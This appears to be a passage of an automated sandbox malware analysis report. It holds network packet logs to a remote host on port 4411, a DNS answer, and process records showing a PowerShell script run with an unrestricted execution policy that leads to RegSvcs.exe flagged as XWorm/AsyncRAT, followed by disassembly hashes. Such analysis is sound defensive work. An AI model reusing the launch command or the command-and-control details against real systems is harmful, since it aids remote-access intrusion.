                                  Dec 18, 2024 08:17:32.635158062 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.683398008 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.683490992 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.706362963 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.800889015 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.800964117 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.803011894 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.826183081 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.881973028 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.897453070 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.897617102 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.960942984 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.961062908 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.017190933 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.017294884 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.066039085 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.120892048 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.122026920 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.208457947 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.241591930 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.241745949 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.272083998 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.277946949 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.397531033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.399990082 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.432768106 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.561038971 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.565993071 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.685611963 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.941483974 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.061311960 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.175981045 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.296753883 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.296822071 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.375448942 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.417519093 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.417678118 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.537194967 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.610543966 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.611421108 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.730875015 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.730937004 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.800415993 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.800549984 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.850389957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.850455999 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.920213938 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.921598911 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.922034979 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.012904882 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.014158010 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.041065931 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.133980036 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.215702057 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.216700077 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.336289883 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.406915903 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.408863068 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.528666973 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.529881001 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.530013084 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.654040098 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.657021999 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.721986055 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.777991056 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.782027960 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.902004957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.007975101 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.066042900 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.105385065 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.198606014 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.225095034 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.225136995 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.344593048 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.754378080 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.874064922 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.878948927 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.998756886 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.037957907 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.157867908 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.158025980 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.188411951 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.269892931 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.320854902 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.320981979 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.348973989 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.440526962 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.440623999 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.539654016 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.560091972 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.560192108 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.631768942 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.675968885 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.679738998 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.679847002 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.799402952 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.867963076 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.869344950 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.988852024 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.066378117 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:38.185926914 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.185988903 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:38.305574894 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.567528009 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.568423986 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:38.688033104 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.763720036 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.764530897 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:38.884138107 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:39.675740004 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:39.796173096 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:39.910533905 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:40.030132055 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.109606028 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.110503912 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:40.230232954 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.344360113 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.345812082 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:40.469541073 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.469692945 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:40.589467049 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.955981970 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.957962990 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:41.077912092 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:41.149458885 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:41.150301933 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:41.270407915 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:42.597774982 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:42.717453957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.031938076 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.032861948 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:43.152430058 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.238259077 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:43.358128071 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.441535950 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:43.561295033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.671865940 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.672844887 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:43.792363882 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.932846069 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.933810949 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.053493977 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.053555965 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.174010992 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.332161903 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.451674938 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.535247087 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.536859035 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.656435966 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.754348040 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.766252041 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.873967886 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.874089956 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.993684053 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.189141989 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.190207958 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:45.309726954 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.387573957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.390835047 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:45.500972986 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.510538101 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.514055967 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:45.633686066 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.035268068 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.154725075 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.154855013 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.274342060 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.274406910 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.394011974 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.394366026 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.468434095 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.468511105 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.513890982 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.513962984 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.587971926 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.633474112 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.699944973 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.701245070 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.779221058 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.820822001 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.821964025 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.891041994 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.941457033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.941647053 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.970230103 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:47.066730022 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:47.108962059 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:47.110122919 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:47.161184072 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:47.229646921 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:47.229968071 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:47.399856091 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.097580910 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.217139006 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.217195988 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.336615086 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.410207987 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.529742956 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.529834986 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.531507015 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.581721067 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.696836948 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.696917057 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.720980883 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.769221067 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.819258928 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.819401026 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.911993980 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.939055920 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.942109108 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:49.007759094 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.061614037 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.062235117 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:49.181787014 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.244077921 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.244957924 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:49.364569902 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.364687920 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:49.485071898 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.207485914 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.326941013 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.327052116 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.446614027 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.446666956 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.566148996 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.566214085 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.685707092 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.685789108 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.805536985 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.844659090 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.845496893 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.996552944 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.998094082 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.156239033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.158128023 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.308836937 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.308918953 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.347326040 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.347392082 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.466876030 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.466954947 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.468915939 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.566251040 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.628823996 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.628967047 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.748609066 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:52.442738056 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:52.562237978 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:52.875960112 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:53.066649914 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:55.454350948 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:55.574037075 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:56.997147083 CET497394411192.168.2.692.255.57.155

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Dec 18, 2024 08:15:09.778357029 CET1.1.1.1192.168.2.60xa3e6No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Dec 18, 2024 08:15:09.778357029 CET1.1.1.1192.168.2.60xa3e6No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:02:15:13
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1"
                                  Imagebase:0x7ff6e3d50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:02:15:13
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff66e660000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:02:15:16
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\ipconfig.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                  Imagebase:0x7ff643c70000
                                  File size:35'840 bytes
                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:02:15:17
                                  Start date:18/12/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0xda0000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:02:15:17
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\wermgr.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3916" "2692" "2700" "2768" "0" "0" "2772" "0" "0" "0" "0" "0"
                                  Imagebase:0x7ff794bc0000
                                  File size:229'728 bytes
                                  MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:02:17:52
                                  Start date:18/12/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 1360
                                  Imagebase:0xd10000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Executed Functions

                                    Function 00007FFD34290FA4 Relevance: 3.2, Strings: 1, Instructions: 1992COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411985142.00007FFD34290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34290000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd34290000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: H
                                    • API String ID: 0-2852464175
                                    • Opcode ID: db272b0ce01b53e86ecc9007c90e75e45152adbbbb7e444972e6088a7a4006fb
                                    • Instruction ID: fb079d6c559ac2fe53fa2c369afa481aab00c6b20f440aecb08f1ffa8e95f850
                                    • Opcode Fuzzy Hash: db272b0ce01b53e86ecc9007c90e75e45152adbbbb7e444972e6088a7a4006fb
                                    • Instruction Fuzzy Hash: 2DD22536B0DB894FF7A69B2848A51B47BE1EF47210B0901FFD18DC71A3DA1AAC16C351
                                    Function 00007FFD341C5F40 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8a>4
                                    • API String ID: 0-1035944333
                                    • Opcode ID: 9d0d44db6c08d25d73509e559151d985d235e70c6091eb3662b3f761fd71ad0d
                                    • Instruction ID: dbcfcacbc26a4807e6a124f884b0eb41269fdb93e734aa0941050edba0cafedb
                                    • Opcode Fuzzy Hash: 9d0d44db6c08d25d73509e559151d985d235e70c6091eb3662b3f761fd71ad0d
                                    • Instruction Fuzzy Hash: 5B61C493F28D8A4BEB58AFA884716A5F2D5FFA5200F54427ED06BD35C7ED2CA8048741
                                    Function 00007FFD341C6F74 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8a>4
                                    • API String ID: 0-1035944333
                                    • Opcode ID: d7e5e70ba609021a14188618866b55960890254eebe9c88a36c053c01b14e511
                                    • Instruction ID: cb25a9a873250df4052706397e4acf92803489e406dafebdd7a778c185e79b43
                                    • Opcode Fuzzy Hash: d7e5e70ba609021a14188618866b55960890254eebe9c88a36c053c01b14e511
                                    • Instruction Fuzzy Hash: FC61C293F2DE864BEB59EFA884716A5F2D1FF65200F1442BED06AD35C7ED2CA8048741
                                    Function 00007FFD341C8AAE Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-1558408351
                                    • Opcode ID: 34f819592b754329755a513f0172eab2dd6b9e8eb58747ef82e6f3568c6342f5
                                    • Instruction ID: f970487d374354bb8379a31f9de1f3af51dc3910c29403b4fc459daba22a8ae8
                                    • Opcode Fuzzy Hash: 34f819592b754329755a513f0172eab2dd6b9e8eb58747ef82e6f3568c6342f5
                                    • Instruction Fuzzy Hash: 43D02232A1C2408BDB1C35744E230393315FB07A0472030BEC287C3463DC3C8093AA80
                                    Function 00007FFD34291390 Relevance: .2, Instructions: 174COMMON
